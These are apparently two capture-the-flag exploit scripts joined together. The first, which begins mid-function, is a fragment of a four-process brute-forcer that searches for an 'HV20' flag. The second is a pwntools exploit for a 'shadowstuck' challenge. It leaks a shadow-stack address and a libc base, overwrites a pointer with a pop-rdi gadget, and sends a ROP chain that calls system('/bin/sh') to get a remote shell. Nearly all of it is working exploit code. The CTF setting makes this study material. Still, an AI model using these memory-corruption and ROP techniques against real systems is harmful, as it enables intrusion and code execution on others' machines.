            p.sendline(str(input))
            output = p.recvall().decode('ascii')
            flag = output.split('Unlocked secret is:')[1].strip()

            if not flag.startswith("H"):
                output_file.write(f"Error: Invalid flag {flag} for input {input}\n")

            output_file.write(f"{flag} for {input}\n")

            if "HV20" in flag:
                print(flag + " " + pid)
                exit(0)
            
            count += 1
            if count % 100 == 0:
                print(f"HV PID {pid} has {count}/{len(search)}")


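# Candidate addresses: every occurrence of the "H" instruction sequence in the
# binary, split into four roughly equal slices, one per worker process.
search = list(elf.search(assembly_for_h))
a, b, c, d = array_split(search, 4)

# Hand the worker and its arguments to Process explicitly instead of wrapping
# them in a lambda: a lambda cannot be pickled, so the lambda form only works
# under the "fork" start method. With "spawn"/"forkserver" (macOS, Windows,
# and the default on newer Pythons) the target must be picklable -- and the
# script's top level must then also be guarded by `if __name__ == "__main__":`
# so the children do not re-run this module and spawn workers of their own.
p1 = Process(target=brute_force_range, args=(a, "1"))
p2 = Process(target=brute_force_range, args=(b, "2"))
p3 = Process(target=brute_force_range, args=(c, "3"))
p4 = Process(target=brute_force_range, args=(d, "4"))

# NOTE(review): a worker that finds the flag calls exit(0) for itself only;
# the other three keep brute-forcing until their slice is exhausted, and the
# parent will wait for them at interpreter exit. Terminate the siblings (or
# share a stop flag) if the full scan is not wanted.
p1.start()
p2.start()
p3.start()
p4.start()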
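# Remote target; swap the two lines below to debug against the local binary with
# the challenge's libc preloaded (keep the same libc build -- the offsets below
# depend on it).
p = remote("challenges.ctf.kaf.sh", 8000)
#p = process('./shadowstuck', env={"LD_PRELOAD":"./libc-2.31.so"})

libc = ELF('./libc-2.31.so')

# Build-specific constants for the bundled libc-2.31; recompute them if the
# challenge ships a different libc.
# Distance from the leaked return address to libc base -- presumably the
# __libc_start_main return site; verify against ./libc-2.31.so.
LEAK_TO_BASE = 159923
# Offset of a `pop rdi; ret` gadget in this libc.
POP_RDI_RET = 0x26b72
PAGE_MASK = 0xfff

# The service announces the shadow-stack address in its first line ("... at 0x...");
# fail loudly on an unexpected banner instead of dying on an IndexError.
banner = p.recvline()
if b'at ' not in banner:
    raise RuntimeError("unexpected banner, no shadow stack address: %r" % banner)
base_shadowstack = int(banner.split(b'at ')[1][:-1], 16)
print("[+] Shadowstack @ 0x%x" % base_shadowstack)

add_employee("Mike")  #0

# 0x10 bytes of padding followed by the low 6 bytes of the shadow-stack address
# (the [:-2] drops the two always-zero high bytes of a user-space pointer).
# Presumably this redirects employee 1's name pointer into the shadow stack so
# that reading it back leaks a saved return address into libc.
fire_employee("Mike", b'a' * 0x10 + pack(base_shadowstack)[:-2])
leak = unpack(read_employee(1).ljust(8, b'\x00'))
print("[+] Leak libc @ 0x%x" % leak)
libc.address = leak - LEAK_TO_BASE
print("[+] Libc @ 0x%x" % libc.address)
# A shared library is mapped page-aligned: a misaligned base means the leak or
# LEAK_TO_BASE is wrong, and sending the chain would only crash the target.
if libc.address & PAGE_MASK:
    raise RuntimeError("libc base 0x%x is not page-aligned; leak offset is wrong" % libc.address)

pop_rdi_gadget = libc.address + POP_RDI_RET

# Write the gadget address where the leak came from and read it back to confirm
# the write landed. This is an explicit check rather than `assert` because
# assert is stripped under `python -O` and the chain must not be sent blind.
# The trailing NULs are stripped, presumably because the write is string-based.
change_employee(1, pack(pop_rdi_gadget).rstrip(b'\x00'))
written = unpack(read_employee(1).ljust(8, b'\x00'))
if written != pop_rdi_gadget:
    raise RuntimeError("gadget write failed: read 0x%x, expected 0x%x" % (written, pop_rdi_gadget))

# ROP chain: pop rdi <- "/bin/sh"; lone `ret` (gadget + 1) to realign the stack
# to 16 bytes before the call; system().
rop = b"aaaaaaaaaaaaaaaaaaaaaaaaa"  #padding
rop += pack(pop_rdi_gadget)
rop += pack(next(libc.search(b'/bin/sh')))
rop += pack(pop_rdi_gadget + 1)  #for stack alignment
rop += pack(libc.symbols['system'])

employee_exit(rop)

p.interactive()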